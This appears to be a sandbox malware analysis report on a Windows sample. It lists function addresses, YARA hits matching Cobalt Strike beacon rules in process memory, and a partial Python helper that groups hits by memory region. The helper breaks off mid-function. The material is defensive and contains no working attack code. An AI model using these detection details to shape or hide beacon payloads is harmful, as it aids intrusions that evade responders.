Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014015C2D8 0_2_000000014015C2D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014018C36C 0_2_000000014018C36C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140158370 0_2_0000000140158370
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140084568 0_2_0000000140084568
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400C0564 0_2_00000001400C0564
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400F8588 0_2_00000001400F8588
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014012C5C0 0_2_000000014012C5C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401EC608 0_2_00000001401EC608
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400686C8 0_2_00000001400686C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401E06F0 0_2_00000001401E06F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140150750 0_2_0000000140150750
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140004770 0_2_0000000140004770
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400B0920 0_2_00000001400B0920
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014006C940 0_2_000000014006C940
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140080934 0_2_0000000140080934
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401809A0 0_2_00000001401809A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014007CA78 0_2_000000014007CA78
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014012CA64 0_2_000000014012CA64
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140134A90 0_2_0000000140134A90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140064AE8 0_2_0000000140064AE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140188B30 0_2_0000000140188B30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140034B58 0_2_0000000140034B58
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140024B70 0_2_0000000140024B70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140170B9C 0_2_0000000140170B9C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014002CBA0 0_2_000000014002CBA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400ACC78 0_2_00000001400ACC78
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400B8CF8 0_2_00000001400B8CF8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401FCD94 0_2_00000001401FCD94
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014014CD9C 0_2_000000014014CD9C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014005CE14 0_2_000000014005CE14
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401E0E78 0_2_00000001401E0E78
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014009CE9C 0_2_000000014009CE9C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140044F68 0_2_0000000140044F68
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401E0F98 0_2_00000001401E0F98
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400A8FBC 0_2_00000001400A8FBC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140114FEC 0_2_0000000140114FEC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401D502C 0_2_00000001401D502C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014008D14C 0_2_000000014008D14C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400D5218 0_2_00000001400D5218
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140095274 0_2_0000000140095274
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400E5288 0_2_00000001400E5288
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401D52C4 0_2_00000001401D52C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401752E8 0_2_00000001401752E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014016D354 0_2_000000014016D354
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400A137C 0_2_00000001400A137C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014009937C 0_2_000000014009937C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400D1378 0_2_00000001400D1378
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140185460 0_2_0000000140185460
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014005145C 0_2_000000014005145C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014006D4C8 0_2_000000014006D4C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401254FC 0_2_00000001401254FC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400CD508 0_2_00000001400CD508
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401D5538 0_2_00000001401D5538
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401F1530 0_2_00000001401F1530
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400DD6AC 0_2_00000001400DD6AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401416C0 0_2_00000001401416C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014010D6C0 0_2_000000014010D6C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014004D7BC 0_2_000000014004D7BC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140115850 0_2_0000000140115850
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400FD888 0_2_00000001400FD888
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400C1910 0_2_00000001400C1910
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400B5974 0_2_00000001400B5974
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140151994 0_2_0000000140151994
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014012DA14 0_2_000000014012DA14
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014013DA6C 0_2_000000014013DA6C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014014DB20 0_2_000000014014DB20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401D5B10 0_2_00000001401D5B10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401CDB40 0_2_00000001401CDB40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140135B30 0_2_0000000140135B30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140119B58 0_2_0000000140119B58
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400D1B84 0_2_00000001400D1B84
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400A1C28 0_2_00000001400A1C28
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014016DC24 0_2_000000014016DC24
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140105C80 0_2_0000000140105C80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140081C80 0_2_0000000140081C80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400F5CA8 0_2_00000001400F5CA8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140049CC4 0_2_0000000140049CC4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140109D40 0_2_0000000140109D40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140065D58 0_2_0000000140065D58
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014015DD64 0_2_000000014015DD64
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400F5DE0 0_2_00000001400F5DE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140139F28 0_2_0000000140139F28
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140185F48 0_2_0000000140185F48
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140051F98 0_2_0000000140051F98
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140159F88 0_2_0000000140159F88
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140112058 0_2_0000000140112058
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140162048 0_2_0000000140162048
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014004A11C 0_2_000000014004A11C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140152154 0_2_0000000140152154
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400C21A1 0_2_00000001400C21A1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400BA1CC 0_2_00000001400BA1CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400621E4 0_2_00000001400621E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014015E200 0_2_000000014015E200
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014008229C 0_2_000000014008229C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014014A2E4 0_2_000000014014A2E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401DE314 0_2_00000001401DE314
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014016E3B0 0_2_000000014016E3B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140126490 0_2_0000000140126490
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140132500 0_2_0000000140132500
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401724E8 0_2_00000001401724E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400F6550 0_2_00000001400F6550
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401FE5AC 0_2_00000001401FE5AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400B65E4 0_2_00000001400B65E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140096610 0_2_0000000140096610
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014013E6C0 0_2_000000014013E6C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400CA6EC 0_2_00000001400CA6EC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401A2710 0_2_00000001401A2710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400C271C 0_2_00000001400C271C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014016A774 0_2_000000014016A774
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400E67A4 0_2_00000001400E67A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400927C8 0_2_00000001400927C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401DE848 0_2_00000001401DE848
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140156870 0_2_0000000140156870
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014006288C 0_2_000000014006288C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401AA8BC 0_2_00000001401AA8BC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014005A8E4 0_2_000000014005A8E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140116954 0_2_0000000140116954
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400D29D8 0_2_00000001400D29D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: String function: 0000000140200750 appears 186 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: String function: 000000014003443C appears 45 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: String function: 00000001400064B0 appears 41 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: String function: 000000014002C650 appears 79 times
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Binary or memory string: OriginalFilename vs SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSBCommandLineScanner.exeJ vs SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Binary or memory string: OriginalFilenameSBCommandLineScanner.exeJ vs SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.3315812932.00000000020A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: Process Memory Space: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe PID: 6516, type: MEMORYSTR Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
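The Yara hits listed above with rule metadata are the same events as the short-form list earlier in this section; what a responder wants from them is which memory regions fired which rules, since that decides where to carve the beacon and pull its configuration. The script below is an added example for this page, not sandbox tooling. It parses both line forms, maps short-form description names onto rule ids, and decodes the .sdmp source names by reading the address, protection and region-type fields against the Windows PAGE_* and MEM_* constants; that field interpretation is my assumption about the naming scheme, and the two fields it does not explain are kept raw. On this report's lines the decoding places a hit at 0x20A0000 in an executable private region next to read-write private regions at 0x2068000 and 0x20D5000, the allocate-then-reprotect pattern recorded above for 0_3_01FC0020. The input is a constructed excerpt of five hit lines from this report.

```python
"""Group the report's Yara hits by the memory region they fired in.

Added example for this report, not the sandbox's tooling. Decoding of the
.sdmp name fields is my reading of them against the Windows PAGE_* and MEM_*
constants (an assumption); the two fields left undecoded are kept raw.
"""
import re
from collections import defaultdict

# Constructed excerpt: five "Matched rule" lines from the report, in both the
# short (description only) and the long (rule metadata) form.
SAMPLE = """\
Source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPE Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.3315812932.00000000020A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: Process Memory Space: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe PID: 6516, type: MEMORYSTR Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
"""

# Rule name ends where the metadata ("key = value, ...") or "Author:" begins.
HIT_RE = re.compile(
    r"^Source: (?P<src>.+?), type: (?P<type>\w+) Matched rule: "
    r"(?P<rule>.+?)(?= \w+ = | Author: |$)(?P<meta>.*)$")
META_RE = re.compile(r"(\w+) = (.*?)(?=, \w+ = |$)")
# proc.snapshot.serial.base.protect.<raw>.regiontype.<raw>.sdmp (assumed layout)
SDMP_RE = re.compile(
    r"^(?P<proc>\d{8})\.(?P<snap>\d{8})\.\d+\.(?P<base>[0-9A-Fa-f]{16})\."
    r"(?P<protect>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.(?P<rtype>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp$")
UNPACK_RE = re.compile(r"^(?P<proc>\d+)\.(?P<snap>\d+)\..+\.(?P<base>[0-9A-Fa-f]+)\.\d+\.unpack$")

PAGE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
        0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
        0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


def decode_source(src: str) -> dict:
    """Classify a hit source as a memory dump, a carved PE, or whole-process strings."""
    if m := SDMP_RE.match(src):
        prot = int(m["protect"], 16)
        return {"kind": "sdmp", "proc": int(m["proc"]), "snapshot": int(m["snap"]),
                "base": int(m["base"], 16),
                "protect": PAGE.get(prot & 0xFF, f"{prot:#x}"),  # modifiers (guard etc.) sit above 0xFF
                "executable": bool(prot & 0xF0),                 # PAGE_EXECUTE* are 0x10..0x80
                "region_type": MEM_TYPE.get(int(m["rtype"], 16), m["rtype"])}
    if m := UNPACK_RE.match(src):
        return {"kind": "unpack", "proc": int(m["proc"]), "snapshot": int(m["snap"]),
                "base": int(m["base"], 16), "protect": None, "executable": None,
                "region_type": "carved PE"}
    pid = re.search(r"PID: (\d+)", src)
    return {"kind": "process", "pid": int(pid.group(1)) if pid else None, "base": None,
            "protect": None, "executable": None, "region_type": "process strings"}


def parse_hits(text: str) -> list[dict]:
    hits = []
    for line in text.splitlines():
        if not (m := HIT_RE.match(line)):
            continue
        meta = dict(META_RE.findall(m["meta"].strip()))
        if am := re.match(r"Author: (.*)", m["meta"].strip()):
            meta["author"] = am.group(1)
        hits.append({"rule": m["rule"], "scan_type": m["type"], "meta": meta,
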